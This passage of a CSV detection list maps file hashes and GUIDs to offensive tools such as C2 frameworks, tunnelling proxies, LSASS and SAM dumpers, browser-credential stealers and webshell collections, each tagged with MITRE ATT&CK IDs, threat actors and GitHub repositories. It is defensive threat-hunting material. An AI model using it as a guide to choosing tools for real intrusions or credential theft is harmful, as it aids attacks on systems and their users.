Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","44293" "*f94f938826dab5d26488e0bc6f5aa8e9eed3a395d1e9a0c9f2a49d877ea56225*",".{0,1000}f94f938826dab5d26488e0bc6f5aa8e9eed3a395d1e9a0c9f2a49d877ea56225.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","#filehash","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","44295" "*f957ae5d8b980b8063af938aa7a1c1ab7293f3d63b49559a82fc3da0c651ea88*",".{0,1000}f957ae5d8b980b8063af938aa7a1c1ab7293f3d63b49559a82fc3da0c651ea88.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44297" "*f9595881272cb6e11dcba5300706a44b2c8f6274313ce948d5f184ca973d0730*",".{0,1000}f9595881272cb6e11dcba5300706a44b2c8f6274313ce948d5f184ca973d0730.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","44298" "*f96112996f7f6cc45c382096b622d7b8b909c38c116affbdb8cdd26f890763d2*",".{0,1000}f96112996f7f6cc45c382096b622d7b8b909c38c116affbdb8cdd26f890763d2.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - 
T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","#filehash","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","44299" "*f9677acd8599417cccac1cf15e623e68f2610f8425eaff77bf7a4364f1a1f0d3*",".{0,1000}f9677acd8599417cccac1cf15e623e68f2610f8425eaff77bf7a4364f1a1f0d3.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","44300" "*f96865aaead8186eba43688e85b6632375f4f058dd1f867152fbc7b6d64344dd*",".{0,1000}f96865aaead8186eba43688e85b6632375f4f058dd1f867152fbc7b6d64344dd.{0,1000}","offensive_tool_keyword","o365-attack-toolkit","A toolkit to attack Office365","T1110 - T1114 - T1119 - T1197 - T1087.002","TA0001 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/o365-attack-toolkit","1","0","#filehash","N/A","10","10","1068","217","2020-11-06T12:09:26Z","2019-07-22T10:39:46Z","44301" "*f97334c71892acdc50380141f0c6144363b7a55a1fe5adf01543b2adbd2d7e44*",".{0,1000}f97334c71892acdc50380141f0c6144363b7a55a1fe5adf01543b2adbd2d7e44.{0,1000}","offensive_tool_keyword","SharpSAMDump","SAM dumping via the registry in C#/.NET","T1003.002 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/jojonas/SharpSAMDump","1","0","#filehash","N/A","10","1","48","8","2025-01-16T07:08:58Z","2024-05-27T10:53:27Z","44302" "*f97affb4f22b7d9c1cd53b5498df7701987d540daa4d607305d62e556971d101*",".{0,1000}f97affb4f22b7d9c1cd53b5498df7701987d540daa4d607305d62e556971d101.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - 
T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","44303" "*f97e26cddde84739083ffd47cc19bcab4e8bfc638de45dcc46873a94d6747e60*",".{0,1000}f97e26cddde84739083ffd47cc19bcab4e8bfc638de45dcc46873a94d6747e60.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","44305" "*f982b52ea6ec43f90e7adbb3a06ae09d9b775dca306962de90f91121d3da2ac2*",".{0,1000}f982b52ea6ec43f90e7adbb3a06ae09d9b775dca306962de90f91121d3da2ac2.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","44306" "*f988bd7635bc12561e00eeb4aff027bd8014dc9b13600c8e8fb597ac9de5c3cf*",".{0,1000}f988bd7635bc12561e00eeb4aff027bd8014dc9b13600c8e8fb597ac9de5c3cf.{0,1000}","offensive_tool_keyword","SharpMiniDump","Create a minidump of the LSASS process from memory","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/b4rtik/SharpMiniDump","1","0","#filehash","N/A","10","3","260","49","2022-11-02T15:47:30Z","2019-09-15T13:45:42Z","44307" "*f993560f69c40d4e80da65ac4db6b38e12e439230979336148abd479f091f8a8*",".{0,1000}f993560f69c40d4e80da65ac4db6b38e12e439230979336148abd479f091f8a8.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44308" "*f99b4944426d96892d0f6d8e20e7266a407cab5afa1eef1dd9eee791e0a0941e*",".{0,1000}f99b4944426d96892d0f6d8e20e7266a407cab5afa1eef1dd9eee791e0a0941e.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","44311" "*f99e70dc19c3d3b3aeeefb1f8dd6b4a2e75d3195f87a7461cd26de4041629f35*",".{0,1000}f99e70dc19c3d3b3aeeefb1f8dd6b4a2e75d3195f87a7461cd26de4041629f35.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44312" "*f9b44f6ba01b4841f672277a3459c5e2fb6325c1c7e2051ec41ef5a85574b66a*",".{0,1000}f9b44f6ba01b4841f672277a3459c5e2fb6325c1c7e2051ec41ef5a85574b66a.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","44317" "*f9b67e1fce905f904c0516ff91e93d776e788f1bd0ac5a10c384b65d217f0c79*",".{0,1000}f9b67e1fce905f904c0516ff91e93d776e788f1bd0ac5a10c384b65d217f0c79.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44318" "*f9b96ad88884c71b8a0d911ebdcb01fe871d795354c4fbd66b705ee7120d83a3*",".{0,1000}f9b96ad88884c71b8a0d911ebdcb01fe871d795354c4fbd66b705ee7120d83a3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44319" "*f9bfe5ec7093e75a2baeb578e87084aa65cd5bc5bd4ffaa4c3d4f9e051cd6a00*",".{0,1000}f9bfe5ec7093e75a2baeb578e87084aa65cd5bc5bd4ffaa4c3d4f9e051cd6a00.{0,1000}","offensive_tool_keyword","SharpOxidResolver","search the current domain for computers and get bindings for all of them","T1018 - T1046 - T1016","TA0007","N/A","KNOTWEED","Discovery","https://github.com/S3cur3Th1sSh1t/SharpOxidResolver","1","0","#filehash","N/A","9","1","50","9","2020-11-25T08:42:06Z","2020-11-25T08:23:23Z","44320" "*f9bfe85b5bad130a6e0d3aaed75193779e150e88613fa1617470cf29d11a05b1*",".{0,1000}f9bfe85b5bad130a6e0d3aaed75193779e150e88613fa1617470cf29d11a05b1.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - 
T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","44321" "*f9c1f7d62460e7ab424bacb00361ec645816cf478c9308ede41ac926c5012db3*",".{0,1000}f9c1f7d62460e7ab424bacb00361ec645816cf478c9308ede41ac926c5012db3.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","#filehash","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","44322" "*f9d5a4845037c07016edfcd1510066195d7c86dea9db7cbf93b0f7f6c2ba0e3b*",".{0,1000}f9d5a4845037c07016edfcd1510066195d7c86dea9db7cbf93b0f7f6c2ba0e3b.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","44326" "*f9da84d51a436405bfde86e2a5abbb4bd19cc1226bc07a9f89c1153437a70797*",".{0,1000}f9da84d51a436405bfde86e2a5abbb4bd19cc1226bc07a9f89c1153437a70797.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","44327" "*f9e0d5910c1883ad6c902d895ebd813018ad7e5a0b4f5988d0c2ed861e9e08de*",".{0,1000}f9e0d5910c1883ad6c902d895ebd813018ad7e5a0b4f5988d0c2ed861e9e08de.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","#filehash","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","44329" "*f9e0e800766e3a28d93ec6f55de8d2c64204d87162898d977eb3156c9cebb24b*",".{0,1000}f9e0e800766e3a28d93ec6f55de8d2c64204d87162898d977eb3156c9cebb24b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44330" "*f9e6aa0e6653bcff0739514717f94111919bc48c44babe38cadb092878e37fbf*",".{0,1000}f9e6aa0e6653bcff0739514717f94111919bc48c44babe38cadb092878e37fbf.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","44331" "*f9ecfddee46fd760c809c843dc86c2bf7b9dfe1ac9ad932f782fb0ed6e34a23e*",".{0,1000}f9ecfddee46fd760c809c843dc86c2bf7b9dfe1ac9ad932f782fb0ed6e34a23e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44333" "*f9ee736ac087001620103f7f42f06cbfc4aa7e37d7f2e1f9b0f10abd6c4349b1*",".{0,1000}f9ee736ac087001620103f7f42f06cbfc4aa7e37d7f2e1f9b0f10abd6c4349b1.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","44334" "*f9ef944aa1980e6ed8153cb2c8926559203d9aa6e1db388efbeabb705d9fe57f*",".{0,1000}f9ef944aa1980e6ed8153cb2c8926559203d9aa6e1db388efbeabb705d9fe57f.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","0","#filehash","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","44335" "*f9fdfa324c6c8d1e73da339f92f03a275e3f847082350a2881cca8c14e401d23*",".{0,1000}f9fdfa324c6c8d1e73da339f92f03a275e3f847082350a2881cca8c14e401d23.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44337" "*f9fe9036adf02a76fc87d26245d0b8db539a16fc4b420f0a7e613a68a1f1ede1*",".{0,1000}f9fe9036adf02a76fc87d26245d0b8db539a16fc4b420f0a7e613a68a1f1ede1.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","44338" "*fa00de3a5f4f0fd4f20a4c8cac94e67c13508d45f35d19ea5e4847c2a7a48814*",".{0,1000}fa00de3a5f4f0fd4f20a4c8cac94e67c13508d45f35d19ea5e4847c2a7a48814.{0,1000}","offensive_tool_keyword","ReverseSock5Proxy","A tiny Reverse Sock5 Proxy","T1090.002 - T1572 - T1071","TA0011 - TA0010","N/A","N/A","C2","https://github.com/Coldzer0/ReverseSock5Proxy","1","0","#filehash","N/A","10","10","317","42","2022-11-28T21:18:26Z","2022-11-25T15:12:59Z","44339" "*fa06c45e4522706565bea7e2532ba67cf2cad3e57e38157c09e46445c1dd100a*",".{0,1000}fa06c45e4522706565bea7e2532ba67cf2cad3e57e38157c09e46445c1dd100a.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","#filehash","N/A","8","4","333","36","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z","44341" 
"*FA0DAF13-5058-4382-AE07-65E44AFB5592*",".{0,1000}FA0DAF13\-5058\-4382\-AE07\-65E44AFB5592.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","#GUIDproject","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","44342" "*fa13cf651b92aff3ee0b74b557c9751444dabef783e511dcbafc15951cfbcb01*",".{0,1000}fa13cf651b92aff3ee0b74b557c9751444dabef783e511dcbafc15951cfbcb01.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","44343" "*fa180238fde76bf5bab9300dadbf245b8c4d51deb46bba8d6b8f2a5fd1e99bb2*",".{0,1000}fa180238fde76bf5bab9300dadbf245b8c4d51deb46bba8d6b8f2a5fd1e99bb2.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","44344" "*fa198e37820eeffb222b11bd1c6ced342167f1b6c9556aea77a048195a3fa74f*",".{0,1000}fa198e37820eeffb222b11bd1c6ced342167f1b6c9556aea77a048195a3fa74f.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","44347" 
"*fa1b7e541e359317e69e48d0f089cfe83a6c8acf04d4c0ed44d76b38cc97e40f*",".{0,1000}fa1b7e541e359317e69e48d0f089cfe83a6c8acf04d4c0ed44d76b38cc97e40f.{0,1000}","offensive_tool_keyword","SharpThief","A one-click program to steal the icon, resource information, version information, modification time, and digital signature (invalid) to make the program appear legitimate","T1036 - T1070 - T1078 - T1027 - T1202","TA0005 - TA0002 - TA0001","N/A","N/A","Defense Evasion","https://github.com/INotGreen/SharpThief","1","0","#filehash","N/A","8","4","372","37","2024-12-17T05:46:39Z","2024-03-05T05:34:50Z","44348" "*fa1d33fe72c69de384fe29f15ba46074e8c4b1a0a7e884fb0dddde4149775f08*",".{0,1000}fa1d33fe72c69de384fe29f15ba46074e8c4b1a0a7e884fb0dddde4149775f08.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","44349" "*fa1fa604b788cc583542e6ea92a9a7802efc55422c9bc18ddadc04d8b5683329*",".{0,1000}fa1fa604b788cc583542e6ea92a9a7802efc55422c9bc18ddadc04d8b5683329.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44350" "*FA2052FB-9E23-43C8-A0EF-43BBB710DC61*",".{0,1000}FA2052FB\-9E23\-43C8\-A0EF\-43BBB710DC61.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation 
framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","The VSTO's GUID","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","44351" "*fa2061026851e6e86d3fec6347eebf2e4fb11284c6e36c3a2b018dcf5e762447*",".{0,1000}fa2061026851e6e86d3fec6347eebf2e4fb11284c6e36c3a2b018dcf5e762447.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","44352" "*fa220acf9aa2972ac3ed01e854cfa219e017a533c0e629740b03151cf962dd91*",".{0,1000}fa220acf9aa2972ac3ed01e854cfa219e017a533c0e629740b03151cf962dd91.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","44353" "*fa32eb358101485802c331ffe1a8d5bda5069322f489e15fc1665c3c088c558c*",".{0,1000}fa32eb358101485802c331ffe1a8d5bda5069322f489e15fc1665c3c088c558c.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - 
TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","44355" "*fa3708cf1fdbefc4aea12781f5f7250388d95e83ba5ae9df08940fd31c1883ff*",".{0,1000}fa3708cf1fdbefc4aea12781f5f7250388d95e83ba5ae9df08940fd31c1883ff.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","44356" "*fa37922b4ab1d0daa46c4beebfe591c916dbd55756da4e4f361a8c311bd2aee0*",".{0,1000}fa37922b4ab1d0daa46c4beebfe591c916dbd55756da4e4f361a8c311bd2aee0.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","44357" "*fa3de04b165bd518b476d23212d3b7ed1b92a600acba4f01ec35213f0efe1467*",".{0,1000}fa3de04b165bd518b476d23212d3b7ed1b92a600acba4f01ec35213f0efe1467.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44358" 
"*fa3ff4c4ead31c5754d9cd83bbee29512cfa4929722594998199e8fd51ae3bfb*",".{0,1000}fa3ff4c4ead31c5754d9cd83bbee29512cfa4929722594998199e8fd51ae3bfb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44359" 